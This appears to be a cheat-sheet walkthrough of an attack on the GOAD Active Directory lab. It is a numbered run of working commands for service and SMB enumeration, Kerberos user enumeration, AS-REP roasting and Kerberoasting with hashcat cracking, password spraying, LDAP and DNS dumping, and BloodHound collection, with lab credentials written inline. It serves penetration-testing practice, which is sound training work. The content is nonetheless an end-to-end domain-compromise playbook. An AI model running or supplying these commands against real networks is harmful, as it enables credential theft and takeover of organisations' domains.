1. Initial Network and Service Enumeration
nmap -Pn -p- -sC -sV -oA full_scan_goad 10.3.10.10-12,22-23
2. SMB Enumeration
crackmapexec smb 10.3.10.11 --users
crackmapexec smb 10.3.10.11 --pass-pol
enum4linux 10.3.10.11
rpcclient -U "NORTH\" 10.3.10.11 -N
net rpc group members 'Domain Users' -W 'NORTH' -I '10.3.10.11' -U '%'
3. Generating Userlists from Game of Thrones Cast Data
curl -s https://www.hbo.com/game-of-thrones/cast-and-crew | \
grep 'href="/game-of-thrones/cast-and-crew/' | \
grep -o 'aria-label="[^"]*"' | cut -d '"' -f 2 | \
awk '{if($2 == "") {print tolower($1)} else {print tolower($1) "." tolower($2);} }' \
> got_users.txt
4. Kerberos User Enumeration
nmap -p 88 --script=krb5-enum-users --script-args="krb5-enum-users.realm='sevenkingdoms.local',userdb=got_users.txt" 10.3.10.10
nmap -p 88 --script=krb5-enum-users --script-args="krb5-enum-users.realm='essos.local',userdb=got_users.txt" 10.3.10.12
nmap -p 88 --script=krb5-enum-users --script-args="krb5-enum-users.realm='essos.local',userdb=got_users.txt" 10.3.10.11
5. Authenticated SMB Enumeration
crackmapexec smb -u khal.drogo -p horse -d essos.local 10.3.10.12 --users
crackmapexec smb 10.3.10.10-23 -u 'a' -p '' --shares
6. AS-REP Roasting and Password Attacks
impacket-GetNPUsers north.sevenkingdoms.local/ -no-pass -usersfile sevenkingdoms_users.txt
cd /usr/share/wordlists
sudo gunzip rockyou.txt.gz
sudo chown kali:kali rockyou.txt
hashcat -m 18200 arsephash /usr/share/wordlists/rockyou.txt
7. Broad Credential Spray
crackmapexec smb 10.3.10.11 -u sevenkingdoms_users.txt -p sevenkingdoms_users.txt --no-bruteforce
8. Full AD User Enumeration
impacket-GetADUsers -all north.sevenkingdoms.local/brandon.stark:iseedeadpeople
9. LDAP Enumeration
ldapsearch -H ldap://10.3.10.11 -D "brandon.stark@north.sevenkingdoms.local" -w iseedeadpeople -b 'DC=north,DC=sevenkingdoms,DC=local' "(&(objectCategory=person)(objectClass=user))" | grep 'distinguishedName:'
ldapsearch -H ldap://10.3.10.12 -D "brandon.stark@north.sevenkingdoms.local" -w iseedeadpeople -b 'DC=essos,DC=local' "(&(objectCategory=person)(objectClass=user))"
ldapsearch -H ldap://10.3.10.10 -D "brandon.stark@north.sevenkingdoms.local" -w iseedeadpeople -b 'DC=sevenkingdoms,DC=local' "(&(objectCategory=person)(objectClass=user))"
10. Kerberoasting
impacket-GetUserSPNs -request -dc-ip 10.3.10.11 north.sevenkingdoms.local/brandon.stark:iseedeadpeople -outputfile kerberoasting.hashes
If your clock is off:
sudo apt install ntpdate -y
sudo ntpdate 10.3.10.11
Then rerun:
impacket-GetUserSPNs north.sevenkingdoms.local/brandon.stark:iseedeadpeople -dc-ip 10.3.10.11 -request
Crack the hashes:
hashcat -m 13100 -a 0 kerberoasting.hashes /usr/share/wordlists/rockyou.txt --force
11. Post Roasting SMB Access
crackmapexec smb 10.3.10.10-23 -u jon.snow -p iknownothing -d north.sevenkingdoms.local --shares
12. ADIDNS Enumeration
git clone https://github.com/dirkjanm/adidnsdump && cd adidnsdump
pip install . --break-system-packages
adidnsdump -u 'north.sevenkingdoms.local\jon.snow' -p 'iknownothing' winterfell.north.sevenkingdoms.local
13. BloodHound Collection
bloodhound-python --zip -c All -d north.sevenkingdoms.local -u brandon.stark -p iseedeadpeople -dc winterfell.north.sevenkingdoms.local -gc winterfell.north.sevenkingdoms.local -ns 10.3.10.11
bloodhound-python --zip -c All -d sevenkingdoms.local -u brandon.stark@north.sevenkingdoms.local -p iseedeadpeople -dc kingslanding.sevenkingdoms.local -gc kingslanding.sevenkingdoms.local -ns 10.3.10.11
bloodhound-python --zip -c All -d essos.local -u brandon.stark@north.sevenkingdoms.local -p iseedeadpeople -dc meereen.essos.local -gc meereen.essos.local -ns 10.3.10.11
0 Comments